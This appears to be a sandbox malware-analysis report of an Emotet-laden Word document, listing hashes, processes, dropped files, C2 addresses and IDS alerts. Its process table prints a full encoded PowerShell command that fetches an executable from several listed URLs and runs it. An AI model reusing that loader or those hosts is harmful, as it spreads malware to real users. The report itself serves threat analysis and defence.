File name: | File-7759-1758851631.doc |
Full analysis: | https://app.any.run/tasks/1497800b-7659-4ab9-bd1b-e54748cd4280 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | May 24, 2019, 18:38:51 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Tasty Soft Mouse withdrawal monitor, Subject: Automotive, Author: Ivah Krajcik, Comments: Ergonomic Cotton Soap Licensed, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri May 24 14:58:00 2019, Last Saved Time/Date: Fri May 24 14:58:00 2019, Number of Pages: 1, Number of Words: 17, Number of Characters: 97, Security: 0 |
MD5: | 94CF785576FC35776B5468066087E722 |
SHA1: | 643EDE588E4C8CAB90B17579664B7E38792A2045 |
SHA256: | FF9A18857B7F818301CB1E49D0C146F013F3B2F0116605F1D48B97EC80ED1433 |
SSDEEP: | 3072:a77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qB+vCmhGTp1plceHl:a77HUUUUUUUUUUUUUUUUUUUT52V+Nmhy |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserTypeLen: | 32 |
---|---|
CompObjUserType: | Microsoft Word 97-2003 Document |
Title: | Tasty Soft Mouse withdrawal monitor |
Subject: | Automotive |
Author: | Ivah Krajcik |
Keywords: | - |
Comments: | Ergonomic Cotton Soap Licensed |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:05:24 13:58:00 |
ModifyDate: | 2019:05:24 13:58:00 |
Pages: | 1 |
Words: | 17 |
Characters: | 97 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | Jast, Nader and Gorczany |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 113 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
Manager: | Hackett |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3948 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\File-7759-1758851631.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2788 | powershell -nop -e JABwAEEAVwAzAF8AdwBKAGoAPQAnAEUAWABMAGIAdwB3AG0AJwA7ACQASAA3AFMAdgBVAHAAIAA9ACAAJwA0ADQAMQAnADsAJAB0ADgAdgBGAHIAawBuAFEAPQAnAFgAMwA2AHMAegBTAGMAbgAnADsAJABaAHAAQwBwADgAaQBCAEgAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEgANwBTAHYAVQBwACsAJwAuAGUAeABlACcAOwAkAGEAWAB6AG4AQwBJAD0AJwBHAGgASgA0AEgASQAwADEAJwA7ACQAbQBEAEcAawBGAEYAPQAmACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4ARQBgAFQALgBXAGUAYgBgAEMATABpAEUAYABOAHQAOwAkAHEAYgB6AE4ATQB3AHcAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBtAGEAaQBzAG8AbgBtAGEAbgBvAHIALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB1AG4AUgBwAEYAWQBDAHcARgBmAC8AQABoAHQAdABwADoALwAvADQAZwBzAHQAYQByAHQAdQBwAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdwBvAHQAZAByAG4AUABHAC8AQABoAHQAdABwADoALwAvAGIAbwBuAGUAcwBwAGUAYwBpAGEAbABpAHMAdABzAGkAbgBtAGEAbgBnAGEAbABvAHIAZQAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwBlAGgAYgBpAG0AOQBxAF8AcQBnAHIAZQA1AG0AYwBqAGYAOQAtADYAOQA2ADAAOAAvAEAAaAB0AHQAcAA6AC8ALwBoAG8AbgBkAGEAdABoAHUAZABvAC4AYwBvAG0ALwB3AHAALQBzAG4AYQBwAHMAaABvAHQAcwAvAGMAbgB3AG4AdwBzAHEAaABfADUANQBjADkAcQAtADkAMgA4ADcANAA2AC8AQABoAHQAdABwADoALwAvAGIAZQB0AGEAYgBhAG4AZwBsAGEAZABlAHMAaAAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AMgA0AHQAaABmAHMAdgBvAHkAXwB0AHkAMABpAHgAaABtAC0ANQA5AC8AJwAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAEoAWgBKADUAMQBzAD0AJwBZAGQAbQBqAFQAMAAnADsAZgBvAHIAZQBhAGMAaAAoACQAbAB3AGgAMgBpAG0AIABpAG4AIAAkAHEAYgB6AE4ATQB3AHcAKQB7AHQAcgB5AHsAJABtAEQARwBrAEYARgAuAEQAbwB3AG4AbABPAEEARABGAGkAbABFACgAJABsAHcAaAAyAGkAbQAsACAAJABaAHAAQwBwADgAaQBCAEgAKQA7ACQAUABpAEkASQBDAGkAPQAnAEgATgB6AGoAdQB3AHQAXwAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAFoAcABDAHAAOABpAEIASAApAC4ATABlAG4ARwB0AGgAIAAtAGcAZQAgADIAMAA4ADAAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AEEAcgBUACgAJABaAHAAQwBwADgAaQBCAEgAKQA7ACQATgBIAG0AaQBHAHAAegA9ACcARgBsAE8ASwBIADEAMQAnADsAYgByAGUAYQBrADsAJABGAE8AbgA0AFAAdgBtADUAPQAnAGoAdgBuAGkASABoAGYAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAdwBDAGQATgA1ADkAegBoAD0AJwBXADYAOABPAFIANwA4ACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2904 | "C:\Users\admin\441.exe" | C:\Users\admin\441.exe | — | powershell.exe |
User: admin Company: VMware, Inc. Integrity Level: MEDIUM Description: VMware Resolution Set Exit code: 0 Version: 9.6.2.31837 | ||||
3860 | --9eb38daf | C:\Users\admin\441.exe | 441.exe | |
User: admin Company: VMware, Inc. Integrity Level: MEDIUM Description: VMware Resolution Set Exit code: 0 Version: 9.6.2.31837 | ||||
3836 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | 441.exe | |
User: admin Company: VMware, Inc. Integrity Level: MEDIUM Description: VMware Resolution Set Exit code: 0 Version: 9.6.2.31837 | ||||
2236 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | |
User: admin Company: VMware, Inc. Integrity Level: MEDIUM Description: VMware Resolution Set Version: 9.6.2.31837 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3948 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR3E83.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2788 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J2U8RJOFH1RS1CTPR5IP.temp | — | |
MD5:— | SHA256:— | |||
3948 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\281D6261.wmf | wmf | |
MD5:184A881C43C32297F194764ABBAA2B8C | SHA256:EE2B30A208BB5BA80AA9B0E90656FBA7F997B360627D06F45EBFE03CBC66296C | |||
3948 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:88E0FDAC51BE8CD88823EE9CED442B44 | SHA256:3C559433287E3AB8E21AE3E2D70A4ED3D6300A2288C2B6DB4601AB7BB8F8657F | |||
3948 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:B19FF5CEFD1DA5D0F2805A945B570C3C | SHA256:F75A592B67565D406D9D7F15EC8C276CD6D0D5E54AD5EF87413F565E44175FC9 | |||
3948 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$le-7759-1758851631.doc | pgc | |
MD5:919E584A721C4C7318641218302B2AD7 | SHA256:86268AA43D47D9C9302E500F189109E6480DA5A01266F03ECC21CC62980276B5 | |||
3948 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F2ECCF2C.wmf | wmf | |
MD5:C0BE899A2F7960FE616AFED86D4F2A35 | SHA256:4F91A8E0FEB18392C238C4D6B37525582E209910890FB432F0E793446D4A42A9 | |||
2788 | powershell.exe | C:\Users\admin\441.exe | executable | |
MD5:1D015AC254436AA310322C7D96A9088B | SHA256:7AFE208A208B852FC2E40E66FD00FA8FD80C1CA080AED1075FDB657896DD6EEB | |||
3948 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BE81FA1A.wmf | wmf | |
MD5:360AD680C2F9C137D08AAAE304FB4B8B | SHA256:6E4A989C3C559FAA2DEEF0D2B5879D1AB3C59A6B7D08D1ABF4D01DAAB5590DEC | |||
3948 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EBDE0D3D.wmf | wmf | |
MD5:95B5BED7F2DADDF367D636778CE3C9E5 | SHA256:90325BBA44EEACA0DDB89CE8E0792505CD7EE37A788AF61B9D4080E8D7006ECD |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2236 | soundser.exe | POST | — | 76.86.20.103:80 | http://76.86.20.103/walk/teapot/ringin/merge/ | US | — | — | malicious |
2236 | soundser.exe | POST | — | 5.67.205.99:80 | http://5.67.205.99/balloon/acquire/ | GB | — | — | malicious |
2788 | powershell.exe | GET | 200 | 138.197.32.141:80 | http://www.maisonmanor.com/wp-content/unRpFYCwFf/ | US | executable | 107 Kb | suspicious |
2236 | soundser.exe | POST | — | 144.139.247.220:80 | http://144.139.247.220/add/scripts/ringin/ | AU | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2236 | soundser.exe | 144.139.247.220:80 | — | Telstra Pty Ltd | AU | malicious |
2788 | powershell.exe | 138.197.32.141:80 | www.maisonmanor.com | Digital Ocean, Inc. | US | suspicious |
2236 | soundser.exe | 5.67.205.99:80 | — | Sky UK Limited | GB | malicious |
2236 | soundser.exe | 76.86.20.103:80 | — | Time Warner Cable Internet LLC | US | malicious |
Domain | IP | Reputation |
---|---|---|
www.maisonmanor.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
2788 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2788 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2788 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2788 | powershell.exe | Misc activity | ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) |
2788 | powershell.exe | Misc activity | ET INFO EXE CheckRemoteDebuggerPresent (Used in Malware Anti-Debugging) |